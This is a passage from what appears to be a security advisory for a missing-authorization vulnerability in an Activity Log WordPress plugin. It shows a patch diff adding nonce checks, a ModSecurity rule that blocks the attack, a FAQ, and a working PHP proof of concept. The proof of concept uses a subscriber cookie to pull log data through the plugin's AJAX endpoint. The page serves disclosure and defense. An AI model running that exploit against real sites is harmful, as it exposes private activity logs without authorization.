+                $s_plus = true;
+            }
+            if ( $s_plus ) {
+                ${'def_col_' . $col}++;
+            }
         }
         $def_col_select++;
     }
 }
-
 ?>

 <!-- This file should primarily consist of HTML with a little bit of PHP. -->
@@ -41,16 +50,26 @@
 <div class="wrap winterlock_wrap">

 <h1>
-    <?php echo __('Activity log','winter-activity-log'); ?>
-    <?php if(get_option('wal_checkbox_disable_hints', '0') == '0'): ?>
-        <a href="#popup_tutorial" id="popup_tutorial" class="page-title-action pull-right"><i class="fa fa-video-camera"></i>  <?php echo __('Need help? Check Video tutorials!','winter-activity-log'); ?></a>
-    <?php endif; ?>
+    <?php
+echo __( 'Activity log', 'winter-activity-log' );
+?>
+    <?php
+if ( get_option( 'wal_checkbox_disable_hints', '0' ) == '0' ) {
+    ?>
+        <a href="#popup_tutorial" id="popup_tutorial" class="page-title-action pull-right"><i class="fa fa-video-camera"></i>  <?php
+    echo __( 'Need help? Check Video tutorials!', 'winter-activity-log' );
+    ?></a>
+    <?php
+}
+?>
 </h1>

 <div class="winterlock_wrap">
     <div class="panel panel-default">
         <div class="panel-heading flex">
-            <h3 class="panel-title"><?php echo __('Logged data','winter-activity-log'); ?></h3>
+            <h3 class="panel-title"><?php
+echo __( 'Logged data', 'winter-activity-log' );
+?></h3>
         </div>
         <div class="panel-body">
             <!-- Data Table -->
@@ -60,24 +79,60 @@
                         <thead>
                             <tr>
                                 <th data-priority="1" width="40px">#</th>
-                                <?php if(sw_wal_log_is_visible_table_column('level')):?>
-                                <th data-priority="2" width="40px"><?php echo __('Level', 'winter-activity-log'); ?></th>
-                                <?php endif;?>
-                                <?php if(sw_wal_log_is_visible_table_column('date')):?>
-                                    <th data-priority="4"><?php echo __('Date', 'winter-activity-log'); ?></th>
-                                <?php endif;?>
-                                <?php if(sw_wal_log_is_visible_table_column('avatar')):?>
-                                    <th data-priority="2"><?php echo __('Avatar', 'winter-activity-log'); ?></th>
-                                <?php endif;?>
-                                <?php if(sw_wal_log_is_visible_table_column('user')):?>
-                                    <th data-priority="2"><?php echo __('User', 'winter-activity-log'); ?></th>
-                                <?php endif;?>
-                                <?php if(sw_wal_log_is_visible_table_column('ip')):?>
-                                    <th><?php echo __('IP', 'winter-activity-log'); ?></th>
-                                <?php endif;?>
-                                <?php if(sw_wal_log_is_visible_table_column('description')):?>
-                                    <th><?php echo __('Description', 'winter-activity-log'); ?></th>
-                                <?php endif;?>
+                                <?php
+if ( sw_wal_log_is_visible_table_column( 'level' ) ) {
+    ?>
+                                <th data-priority="2" width="40px"><?php
+    echo __( 'Level', 'winter-activity-log' );
+    ?></th>
+                                <?php
+}
+?>
+                                <?php
+if ( sw_wal_log_is_visible_table_column( 'date' ) ) {
+    ?>
+                                    <th data-priority="4"><?php
+    echo __( 'Date', 'winter-activity-log' );
+    ?></th>
+                                <?php
+}
+?>
+                                <?php
+if ( sw_wal_log_is_visible_table_column( 'avatar' ) ) {
+    ?>
+                                    <th data-priority="2"><?php
+    echo __( 'Avatar', 'winter-activity-log' );
+    ?></th>
+                                <?php
+}
+?>
+                                <?php
+if ( sw_wal_log_is_visible_table_column( 'user' ) ) {
+    ?>
+                                    <th data-priority="2"><?php
+    echo __( 'User', 'winter-activity-log' );
+    ?></th>
+                                <?php
+}
+?>
+                                <?php
+if ( sw_wal_log_is_visible_table_column( 'ip' ) ) {
+    ?>
+                                    <th><?php
+    echo __( 'IP', 'winter-activity-log' );
+    ?></th>
+                                <?php
+}
+?>
+                                <?php
+if ( sw_wal_log_is_visible_table_column( 'description' ) ) {
+    ?>
+                                    <th><?php
+    echo __( 'Description', 'winter-activity-log' );
+    ?></th>
+                                <?php
+}
+?>
                                 <th data-priority="3" width="100px"></th>
                                 <th width="10px"><input type="checkbox" class="selectAll" name="selectAll" value="all"></th>
                             </tr>
@@ -87,29 +142,69 @@
                         </tbody>
                         <tfoot>
                             <tr>
-                                <th><input type="text" name="filter_id" class="dinamic_par"  placeholder="<?php echo __('Filter #', 'winter-activity-log'); ?>" /></th>
-                                <?php if(sw_wal_log_is_visible_table_column('level')):?>
-                                <th><input type="text" name="filter_level" class="dinamic_par" placeholder="<?php echo __('Filter Level', 'winter-activity-log'); ?>" /></th>
-                                <?php endif;?>
-                                <?php if(sw_wal_log_is_visible_table_column('date')):?>
-                                <th><input type="text" id="filter_date" name="filter_date" class="dinamic_par" placeholder="<?php echo __('Filter Date From', 'winter-activity-log'); ?>" /></th>
-                                <?php endif;?>
-                                <?php if(sw_wal_log_is_visible_table_column('avatar')):?>
+                                <th><input type="text" name="filter_id" class="dinamic_par"  placeholder="<?php
+echo __( 'Filter #', 'winter-activity-log' );
+?>" /></th>
+                                <?php
+if ( sw_wal_log_is_visible_table_column( 'level' ) ) {
+    ?>
+                                <th><input type="text" name="filter_level" class="dinamic_par" placeholder="<?php
+    echo __( 'Filter Level', 'winter-activity-log' );
+    ?>" /></th>
+                                <?php
+}
+?>
+                                <?php
+if ( sw_wal_log_is_visible_table_column( 'date' ) ) {
+    ?>
+                                <th><input type="text" id="filter_date" name="filter_date" class="dinamic_par" placeholder="<?php
+    echo __( 'Filter Date From', 'winter-activity-log' );
+    ?>" /></th>
+                                <?php
+}
+?>
+                                <?php
+if ( sw_wal_log_is_visible_table_column( 'avatar' ) ) {
+    ?>
                                 <th></th>
-                                <?php endif;?>
-                                <?php if(sw_wal_log_is_visible_table_column('user')):?>
-                                <th><input type="text" id="filter_user" name="filter_user" value="<?php echo esc_attr(wmvc_show_data('filter_user', $_GET, '')); ?>" class="dinamic_par" placeholder="<?php echo __('Filter User', 'winter-activity-log'); ?>" /></th>
-                                <?php endif;?>
-                                <?php if(sw_wal_log_is_visible_table_column('ip')):?>
-                                <th><input type="text" name="filter_ip" class="dinamic_par" placeholder="<?php echo __('Filter IP', 'winter-activity-log'); ?>" /></th>
-                                <?php endif;?>
-                                <?php if(sw_wal_log_is_visible_table_column('description')):?>
-                                <th><input type="text" name="filter_description" class="dinamic_par" placeholder="<?php echo __('Filter Description', 'winter-activity-log'); ?>" /></th>
-                                <?php endif;?>
+                                <?php
+}
+?>
+                                <?php
+if ( sw_wal_log_is_visible_table_column( 'user' ) ) {
+    ?>
+                                <th><input type="text" id="filter_user" name="filter_user" value="<?php
+    echo esc_attr( wmvc_show_data( 'filter_user', $_GET, '' ) );
+    ?>" class="dinamic_par" placeholder="<?php
+    echo __( 'Filter User', 'winter-activity-log' );
+    ?>" /></th>
+                                <?php
+}
+?>
+                                <?php
+if ( sw_wal_log_is_visible_table_column( 'ip' ) ) {
+    ?>
+                                <th><input type="text" name="filter_ip" class="dinamic_par" placeholder="<?php
+    echo __( 'Filter IP', 'winter-activity-log' );
+    ?>" /></th>
+                                <?php
+}
+?>
+                                <?php
+if ( sw_wal_log_is_visible_table_column( 'description' ) ) {
+    ?>
+                                <th><input type="text" name="filter_description" class="dinamic_par" placeholder="<?php
+    echo __( 'Filter Description', 'winter-activity-log' );
+    ?>" /></th>
+                                <?php
+}
+?>
                                 <th colspan="2">
                                     <div class="winterlock_save_search_filter">
                                         <div class="winterlock_save_search_filter_btn">
-                                            <a href="#" class="btn btn_save"><?php echo __('Save', 'winter-activity-log'); ?></a>
+                                            <a href="#" class="btn btn_save"><?php
+echo __( 'Save', 'winter-activity-log' );
+?></a>
                                             <a href="#" class="btn-toggle"><i class="fa fa-angle-down"></i></a>
                                         </div>
                                         <ul class="winterlock_list_filters">
@@ -123,38 +218,47 @@
             </div>

             <div class="form-inline">
-                <div class="checkbox  <?php if ( !winteractivitylog()->is_plan_or_trial('standard') ) echo 'wal-pro'; ?>">
+                <div class="checkbox  <?php
+if ( !winteractivitylog()->is_plan_or_trial( 'standard' ) ) {
+    echo 'wal-pro';
+}
+?>">
                     <label>
-                        <input id="wal_live_monitoring" type="checkbox"> <?php echo __('Live monitoring enable (autorefresh each 10 sec)', 'winter-activity-log'); ?>
+                        <input id="wal_live_monitoring" type="checkbox"> <?php
+echo __( 'Live monitoring enable (autorefresh each 10 sec)', 'winter-activity-log' );
+?>
                     </label>
                 </div>

                 <div class="footer-btns">
-                    <a href="<?php echo admin_url("admin.php?page=wal_reports&function=report_edit"); ?>" class="btn btn-warning pull-right"><i class="fa fa-download"></i>  <?php echo __('Export/Generate Report','winter-activity-log')?></a>
-                    <a href="#bulk_remove-form" id="bulk_remove" class="btn btn-danger pull-right popup-with-form"><i class="fa fa-remove"></i>  <?php echo __('Bulk remove','winter-activity-log')?><i class="fa fa-spinner fa-spin fa-custom-ajax-indicator-opc ajax-indicator-masking hidden_opacity"></i></a>
-                    <a href="#clear_filters" id="clear_filters" class="btn btn-danger pull-right "><i class="fa fa-trash"></i>  <?php echo __('Clear all filters','winter-activity-log')?></a>
+                    <a href="<?php
+echo admin_url( "admin.php?page=wal_reports&function=report_edit" );
+?>" class="btn btn-warning pull-right"><i class="fa fa-download"></i>  <?php
+echo __( 'Export/Generate Report', 'winter-activity-log' );
+?></a>
+                    <a href="#bulk_remove-form" id="bulk_remove" class="btn btn-danger pull-right popup-with-form"><i class="fa fa-remove"></i>  <?php
+echo __( 'Bulk remove', 'winter-activity-log' );
+?><i class="fa fa-spinner fa-spin fa-custom-ajax-indicator-opc ajax-indicator-masking hidden_opacity"></i></a>
+                    <a href="#clear_filters" id="clear_filters" class="btn btn-danger pull-right "><i class="fa fa-trash"></i>  <?php
+echo __( 'Clear all filters', 'winter-activity-log' );
+?></a>
                 </div>
             </div>
         </div>
     </div>

     <?php
-    if ( winteractivitylog()->is__premium_only() ) {
-    if ( !winteractivitylog()->is_plan_or_trial('standard') ){ ?>
-        <div class="alert alert-danger" role="alert"><?php echo __('Min. standard package is required for live monitoring feature', 'winter-activity-log'); ?></div>
-    <?php }} ?>
+?>

 </div>
 </div>


-<?php
-
-wp_enqueue_style('winter-activity-log_basic_wrapper');
+<?php
+wp_enqueue_style( 'winter-activity-log_basic_wrapper' );
 wp_enqueue_script( 'datatables' );
 wp_enqueue_script( 'dataTables-responsive' );
 wp_enqueue_script( 'dataTables-select' );
-
 wp_enqueue_style( 'dataTables-select' );
 ?>

@@ -178,12 +282,18 @@
          //debug: true
     });

-    <?php if(sw_wal_log_is_visible_table_column('date')):?>
+    <?php
+if ( sw_wal_log_is_visible_table_column( 'date' ) ) {
+    ?>
     $("#filter_date").on("dp.change", function (e) {
         $("#filter_date").trigger('change');
-        table.columns(<?php $def_col_date;?>).search( $('#filter_date').val() ).draw();
+        table.columns(<?php
+    $def_col_date;
+    ?>).search( $('#filter_date').val() ).draw();
     });
-    <?php endif;?>
+    <?php
+}
+?>

     /* winterlock_save_search_filter */
     function generate_json_filter()
@@ -242,9 +352,14 @@
             "page": 'winteractivitylog',
             'function': 'filter_get',
             "action": 'winter_activity_log_action',
+             "winterlock_secure": '<?php
+echo esc_js( wp_create_nonce( 'winterlock_secure_ajax' ) );
+?>'
         };

-        $.post('<?php echo esc_url(admin_url( 'admin-ajax.php' ));?>', data,
+        $.post('<?php
+echo esc_url( admin_url( 'admin-ajax.php' ) );
+?>', data,
         function(data){
             var html ='';
             $('.winterlock_save_search_filter .winterlock_list_filters').html(html);
@@ -282,7 +397,9 @@

                 setTimeout(function(){jQuery('.dinamic_par[name="sw_log_search"]').trigger('change');},1500);

-                sw_log_notify('<?php echo __('Loaded filter', 'winter-activity-log'); ?> '+$(this).contents()[0].textContent);
+                sw_log_notify('<?php
+echo __( 'Loaded filter', 'winter-activity-log' );
+?> '+$(this).contents()[0].textContent);
                 $(this).closest('.winterlock_save_search_filter').removeClass('show');
         })

@@ -295,14 +412,23 @@
                     'function': 'filter_remove',
                     "action": 'winter_activity_log_action',
                     "filter_id": $(this).attr('data-fielderid') || '',
+                     "winterlock_secure": '<?php
+echo esc_js( wp_create_nonce( 'winterlock_secure_ajax' ) );
+?>'
                 };
-                sw_log_notify('<?php echo __('Removing filter', 'winter-activity-log'); ?> '+title, 'loading');
-
-                $.post('<?php echo esc_url(admin_url( 'admin-ajax.php' ));?>', data,
+                sw_log_notify('<?php
+echo __( 'Removing filter', 'winter-activity-log' );
+?> '+title, 'loading');
+
+                $.post('<?php
+echo esc_url( admin_url( 'admin-ajax.php' ) );
+?>', data,
                 function(data){

                 }, "json").success(function(){
-                    sw_log_notify('<?php echo __('Removed filter', 'winter-activity-log'); ?> '+title);
+                    sw_log_notify('<?php
+echo __( 'Removed filter', 'winter-activity-log' );
+?> '+title);
                     reload_filters();
                 });
         })
@@ -318,7 +444,9 @@
              is_empty = false;

         if(is_empty) {
-            sw_log_notify('<?php echo __('Fitlers are empty', 'winter-activity-log'); ?>', 'error');
+            sw_log_notify('<?php
+echo __( 'Fitlers are empty', 'winter-activity-log' );
+?>', 'error');
             return false;
         }

@@ -326,17 +454,25 @@
         $.confirm({
             boxWidth: '400px',
             useBootstrap: false,
-            title: '<?php echo __('Save', 'winter-activity-log'); ?>',
+            title: '<?php
+echo __( 'Save', 'winter-activity-log' );
+?>',
             content: '' +
             '<form action="" class="winterlock_list_filters_form formName">' +
             '<div class="form-group">' +
-            '<label><?php echo __('Filter name', 'winter-activity-log'); ?></label>' +
-            '<input type="text" placeholder="<?php echo __('Filter name', 'winter-activity-log'); ?>" class="filter_name form-control" required />' +
+            '<label><?php
+echo __( 'Filter name', 'winter-activity-log' );
+?></label>' +
+            '<input type="text" placeholder="<?php
+echo __( 'Filter name', 'winter-activity-log' );
+?>" class="filter_name form-control" required />' +
             '</div>' +
             '</form>',
             buttons: {
                 formSubmit: {
-                    text: '<?php echo __('Save', 'winter-activity-log'); ?>',
+                    text: '<?php
+echo __( 'Save', 'winter-activity-log' );
+?>',
                     btnClass: 'btn-blue',
                     action: function () {
                         var filter_name = this.$content.find('.filter_name').val();
@@ -350,20 +486,29 @@
                             'function': 'filter_save',
                             "action": 'winter_activity_log_action',
                             "filter_name": filter_name,
-                            "filter_param": generate_json_filter()
+                            "filter_param": generate_json_filter(),
+                             "winterlock_secure": '<?php
+echo esc_js( wp_create_nonce( 'winterlock_secure_ajax' ) );
+?>'
                         };

-                        $.post('<?php echo esc_url(admin_url( 'admin-ajax.php' ));?>', data,
+                        $.post('<?php
+echo esc_url( admin_url( 'admin-ajax.php' ) );
+?>', data,
                         function(data){
                         }, "json").success(function(){
-                            sw_log_notify('<?php echo __('Saved filter', 'winter-activity-log'); ?> '+filter_name);
+                            sw_log_notify('<?php
+echo __( 'Saved filter', 'winter-activity-log' );
+?> '+filter_name);
                             reload_filters();
                         } );

                     }
                 },
                 cancel: {
-                    text: '<?php echo __('Cancel', 'winter-activity-log'); ?>',
+                    text: '<?php
+echo __( 'Cancel', 'winter-activity-log' );
+?>',
                     action: function () {
                     }
                 }
@@ -433,14 +578,18 @@

         if(count == 0)
         {
-            alert('<?php echo esc_attr__('Please select listings to remove', 'winter-activity-log'); ?>');
+            alert('<?php
+echo esc_attr__( 'Please select listings to remove', 'winter-activity-log' );
+?>');
             load_indicator_opc.addClass('hidden_opacity');
             return false;
         }
         else
         {

-            if(confirm('<?php esc_js(__('Are you sure?', 'winter-activity-log')); ?>'))
+            if(confirm('<?php
+esc_js( __( 'Are you sure?', 'winter-activity-log' ) );
+?>'))
             {
                 $('img#ajax-indicator-masking').show();

@@ -448,7 +597,11 @@
                 var ids = table.rows( { selected: true } ).data().pluck( 'idlog' ).toArray();

                 // ajax to remove rows
-                $.post('<?php menu_page_url( 'winteractivitylog', true ); ?>&function=bulk_remove&_wpnonce=<?php echo esc_js(wp_create_nonce( 'winteractivitylog-bulk'));?>', { log_ids: ids }, function(data) {
+                $.post('<?php
+menu_page_url( 'winteractivitylog', true );
+?>&function=bulk_remove&_wpnonce=<?php
+echo esc_js( wp_create_nonce( 'winteractivitylog-bulk' ) );
+?>', { log_ids: ids }, function(data) {

                     $('img#ajax-indicator-masking').hide();

@@ -494,15 +647,22 @@
                     return $.extend( {}, d, {
                         "page": 'winteractivitylog',
                         "function": 'datatable',
-                        "action": 'winter_activity_log_action'
+                        "action": 'winter_activity_log_action',
+                        "winterlock_secure": '<?php
+echo esc_js( wp_create_nonce( 'winterlock_secure_ajax' ) );
+?>',
                     } );


                 }
             },
             "language": {
-                search: "<?php esc_js(__('Search', 'winter-activity-log')); ?>",
-                searchPlaceholder: "<?php esc_js(__('Enter here filter tag for any column', 'winter-activity-log')); ?>"
+                search: "<?php
+esc_js( __( 'Search', 'winter-activity-log' ) );
+?>",
+                searchPlaceholder: "<?php
+esc_js( __( 'Enter here filter tag for any column', 'winter-activity-log' ) );
+?>"
             },
             "initComplete": function(settings, json) {
             },
@@ -511,16 +671,24 @@
 //                if(sw_log_s_table_load_counter == 0)
                 {
                     sw_log_s_table_load_counter++;
-                    <?php if(sw_wal_log_is_visible_table_column('user')):?>
+                    <?php
+if ( sw_wal_log_is_visible_table_column( 'user' ) ) {
+    ?>
                     if($('#filter_user').val() != '')
-                    setTimeout(function(){ table.columns(<?php echo intval($def_col_user);?>).search( $('#filter_user').val() ).draw(); }, 1000);
-                    <?php endif;?>
+                    setTimeout(function(){ table.columns(<?php
+    echo intval( $def_col_user );
+    ?>).search( $('#filter_user').val() ).draw(); }, 1000);
+                    <?php
+}
+?>

                 }

                 $('a.delete_button').click(function(){

-                    if(confirm('<?php esc_js(__('Are you sure?', 'winter-activity-log')); ?>'))
+                    if(confirm('<?php
+esc_js( __( 'Are you sure?', 'winter-activity-log' ) );
+?>'))
                     {
                        // ajax to remove row
                         $.post($(this).attr('href'), function( [] ) {
@@ -562,24 +730,48 @@
             },
             'columns': [
                 { data: "idlog" },
-                <?php if(sw_wal_log_is_visible_table_column('level')):?>
+                <?php
+if ( sw_wal_log_is_visible_table_column( 'level' ) ) {
+    ?>
                     { data: "level" },
-                <?php endif;?>
-                <?php if(sw_wal_log_is_visible_table_column('date')):?>
+                <?php
+}
+?>
+                <?php
+if ( sw_wal_log_is_visible_table_column( 'date' ) ) {
+    ?>
                     { data: "date"   },
-                <?php endif;?>
-                <?php if(sw_wal_log_is_visible_table_column('avatar')):?>
+                <?php
+}
+?>
+                <?php
+if ( sw_wal_log_is_visible_table_column( 'avatar' ) ) {
+    ?>
                     { data: "avatar"  },
-                <?php endif;?>
-                <?php if(sw_wal_log_is_visible_table_column('user')):?>
+                <?php
+}
+?>
+                <?php
+if ( sw_wal_log_is_visible_table_column( 'user' ) ) {
+    ?>
                     { data: "user_info"  },
-                <?php endif;?>
-                <?php if(sw_wal_log_is_visible_table_column('ip')):?>
+                <?php
+}
+?>
+                <?php
+if ( sw_wal_log_is_visible_table_column( 'ip' ) ) {
+    ?>
                     { data: "ip"   },
-                <?php endif;?>
-                <?php if(sw_wal_log_is_visible_table_column('description')):?>
+                <?php
+}
+?>
+                <?php
+if ( sw_wal_log_is_visible_table_column( 'description' ) ) {
+    ?>
                     { data: "description"},
-                <?php endif;?>
+                <?php
+}
+?>

                 { data: "edit"    },
                 { data: "checkbox"  }
@@ -596,48 +788,76 @@
             },
             order: [[ 0, 'desc' ]],
             columnDefs: [
-                            <?php if(sw_wal_log_is_visible_table_column('avatar')):?>
+                            <?php
+if ( sw_wal_log_is_visible_table_column( 'avatar' ) ) {
+    ?>
                             {
-                                targets: <?php echo intval($def_col_avatar);?>,
+                                targets: <?php
+    echo intval( $def_col_avatar );
+    ?>,
                                 orderable: false
                             },
-                            <?php endif;?>
+                            <?php
+}
+?>
                             {
                                 //className: 'control',
                                 className: 'details-control',
                                 orderable: true,
                                 targets:   0
                             },
-                            <?php if(sw_wal_log_is_visible_table_column('user')):?>
+                            <?php
+if ( sw_wal_log_is_visible_table_column( 'user' ) ) {
+    ?>
                             {
                                 //className: 'control',
                                 //className: 'details-control',
                                 orderable: false,
-                                targets:   <?php echo intval($def_col_user);?>
+                                targets:   <?php
+    echo intval( $def_col_user );
+    ?>
                             },
-                            <?php endif;?>
-                            <?php if(sw_wal_log_is_visible_table_column('ip')):?>
+                            <?php
+}
+?>
+                            <?php
+if ( sw_wal_log_is_visible_table_column( 'ip' ) ) {
+    ?>
                             {
-                                targets: <?php echo intval($def_col_ip);?>,
+                                targets: <?php
+    echo intval( $def_col_ip );
+    ?>,
                                 orderable: false,
                                 defaultContent: '2',
                             },
-                            <?php endif;?>
-                            <?php if(sw_wal_log_is_visible_table_column('description')):?>
+                            <?php
+}
+?>
+                            <?php
+if ( sw_wal_log_is_visible_table_column( 'description' ) ) {
+    ?>
                             {
-                                targets: <?php echo intval($def_col_description);?>,
+                                targets: <?php
+    echo intval( $def_col_description );
+    ?>,
                                 orderable: false
                             },
-                            <?php endif;?>
+                            <?php
+}
+?>
                             {
-                                targets: <?php echo intval($def_col_select);?>,
+                                targets: <?php
+echo intval( $def_col_select );
+?>,
                                 orderable: false
                             },
                             {
                                 className: 'select-checkbox',
                                 orderable: false,
                                 defaultContent: '',
-                                targets:   <?php echo intval($def_col_select+1);?>
+                                targets:   <?php
+echo intval( $def_col_select + 1 );
+?>
                             }
             ],
             select: {
@@ -649,11 +869,21 @@
 					'sPrevious': '<i class="fa fa-angle-left"></i>',
 					'sNext': '<i class="fa fa-angle-right"></i>'
 				},
-                'sSearch': "<?php esc_js(__('Search', 'winter-activity-log')); ?>",
-                "sLengthMenu": "<?php esc_js(__('Show _MENU_ entries', 'winter-activity-log')); ?>",
-                "sInfoEmpty": "<?php esc_js(__('Showing 0 to 0 of 0 entries', 'winter-activity-log')); ?>",
-                "sInfo": "<?php esc_js( __('Showing _START_ to _END_ of _TOTAL_ entries', 'winter-activity-log')); ?>",
-                "sEmptyTable": "<?php esc_js(__('No data available in table', 'winter-activity-log')); ?>",
+                'sSearch': "<?php
+esc_js( __( 'Search', 'winter-activity-log' ) );
+?>",
+                "sLengthMenu": "<?php
+esc_js( __( 'Show _MENU_ entries', 'winter-activity-log' ) );
+?>",
+                "sInfoEmpty": "<?php
+esc_js( __( 'Showing 0 to 0 of 0 entries', 'winter-activity-log' ) );
+?>",
+                "sInfo": "<?php
+esc_js( __( 'Showing _START_ to _END_ of _TOTAL_ entries', 'winter-activity-log' ) );
+?>",
+                "sEmptyTable": "<?php
+esc_js( __( 'No data available in table', 'winter-activity-log' ) );
+?>",
 			},
 			'dom': "<'row'<'col-sm-7 col-md-5'f><'col-sm-5 col-md-6'l>>" + "<'row'<'col-sm-12'tr>>" + "<'row'<'col-sm-5'i><'col-sm-7'p>>"
 		});
@@ -782,19 +1012,35 @@
             closeIcon: true,
             draggable: true,
             backgroundDismiss: true, // this will just close the modal
-            title: '<?php echo esc_html__('Tutorials', 'winter-activity-log');?>',
+            title: '<?php
+echo esc_html__( 'Tutorials', 'winter-activity-log' );
+?>',
             content: '<div class="winterlock_wrap wl_popup_tutorial">' +
-                '<div class="alert alert-warning" role="alert"><a target="_blank" href="https://www.youtube.com/watch?v=VWI1WvlQQa8&list=PL0MjUuUth-hVFykhkW_UN8fsoAYJVbhf2"><i class="fa fa-youtube-play" aria-hidden="true"></i> <?php echo __('How to use quick search filtering?', 'winter-activity-log'); ?></a></div>'+
-                '<div class="alert alert-warning" role="alert"><a target="_blank" href="https://www.youtube.com/watch?v=v8jJcRkEfjI&list=PL0MjUuUth-hVFykhkW_UN8fsoAYJVbhf2"><i class="fa fa-youtube-play" aria-hidden="true"></i> <?php echo __('How to Live Montor with auto refresh and detect login users?', 'win

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-24987
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:100024987,phase:2,deny,status:403,chain,msg:'CVE-2026-24987 - Activity Log plugin missing authorization via AJAX',severity:'CRITICAL',tag:'CVE-2026-24987',tag:'WordPress',tag:'Plugin/Activity-Log'"
  SecRule ARGS_POST:action "@streq winter_activity_log_action" "chain"
    SecRule &ARGS_POST:winterlock_secure "@eq 0" "chain"
      SecRule ARGS_POST:page "@rx ^(wal_(cloudintegration|controlsecurity|disabledlogs|history|logalerts|reports|usersessions)|winteractivitylog)$" "chain"
        SecRule ARGS_POST:function "@rx ^(datatable|filter_(save|get|remove))$"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24987 - Activity Log for WordPress <= 1.2.7 - Missing Authorization
<?php
/**
 * Proof of Concept for CVE-2026-24987
 * Demonstrates unauthorized access to plugin's datatable endpoint
 * Requires valid WordPress subscriber session cookie
 */

$target_url = 'https://vulnerable-site.com';
$cookie = 'wordpress_logged_in_abc=...'; // Valid subscriber session cookie

// Target the wal_history controller datatable function
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

$post_data = [
    'action' => 'winter_activity_log_action',
    'page' => 'wal_history',           // Controller name
    'function' => 'datatable',         // Vulnerable method
    // Additional parameters for datatable functionality
    'draw' => '1',
    'start' => '0',
    'length' => '10',
    'search[value]' => '',
    'order[0][column]' => '0',
    'order[0][dir]' => 'asc'
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Cookie: ' . $cookie,
    'Content-Type: application/x-www-form-urlencoded',
    'X-Requested-With: XMLHttpRequest'
]);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code === 200 && !empty($response)) {
    $data = json_decode($response, true);
    if (json_last_error() === JSON_ERROR_NONE && isset($data['data'])) {
        echo "SUCCESS: Retrieved " . count($data['data']) . " log entriesn";
        echo "Sample data: " . print_r($data['data'][0] ?? 'No data', true) . "n";
    } else {
        echo "ERROR: Invalid JSON response or missing data fieldn";
        echo "Raw response: " . $response . "n";
    }
} else {
    echo "ERROR: HTTP $http_coden";
    echo "Response: " . $response . "n";
}
?>

Frequently Asked Questions

What is CVE-2026-24987?
Overview of the vulnerability
CVE-2026-24987 is a medium severity vulnerability in the Activity Log for WordPress plugin, affecting versions up to and including 1.2.7. It is caused by a missing authorization check, allowing authenticated users with Subscriber-level access to perform unauthorized actions.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability allows authenticated attackers to send requests to specific AJAX endpoints without proper capability checks. By using a valid WordPress authentication cookie, attackers can access sensitive activity log data and perform administrative functions that should be restricted.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Activity Log for WordPress plugin version 1.2.7 or earlier is affected. This includes sites where users have Subscriber-level permissions or higher, as they can exploit the vulnerability to gain unauthorized access.
How can I check if my site is vulnerable?
Verification steps
To check if your site is vulnerable, verify the version of the Activity Log for WordPress plugin installed on your site. If it is version 1.2.7 or earlier, your site is susceptible to this vulnerability.
How can I fix this vulnerability?
Mitigation steps
The vulnerability has been patched in version 1.2.8 of the Activity Log for WordPress plugin. Update your plugin to the latest version to ensure that the missing authorization checks and nonce verifications are in place.
What does the CVSS score of 4.3 mean?
Understanding severity levels
A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the risk is not critical, it is significant enough to warrant immediate attention and remediation to prevent potential exploitation.
What are the risks of not addressing this vulnerability?
Potential consequences
Failing to address this vulnerability could allow unauthorized users to access sensitive activity logs, manipulate filters, and export data. This could lead to privilege escalation and exposure of confidential information about site operations and user behavior.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept demonstrates how an attacker can exploit the vulnerability by sending a POST request to the admin-ajax.php endpoint with specific parameters. This allows access to the datatable function without proper authorization, highlighting the severity of the issue.
What should I do if I cannot update the plugin immediately?
Interim measures
If you cannot update the plugin immediately, consider disabling the Activity Log for WordPress plugin until you can apply the patch. Additionally, review user permissions and limit access to authenticated users with higher privileges.
How does nonce verification enhance security?
Role of nonce in AJAX requests
Nonce verification helps protect against Cross-Site Request Forgery (CSRF) attacks by ensuring that the request is coming from a legitimate source. It adds an additional layer of security, making it harder for attackers to exploit vulnerable endpoints.
What are AJAX endpoints in WordPress?
Understanding AJAX in WordPress
AJAX endpoints in WordPress allow asynchronous requests to be made to the server without reloading the page. They are commonly used for dynamic content updates and can be vulnerable if not properly secured, as seen in this vulnerability.
How can I stay informed about future vulnerabilities?
Best practices for security awareness
Stay informed by subscribing to security advisories from WordPress, following security blogs, and monitoring CVE databases. Regularly check for updates to plugins and themes, and consider using security plugins that provide vulnerability alerts.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations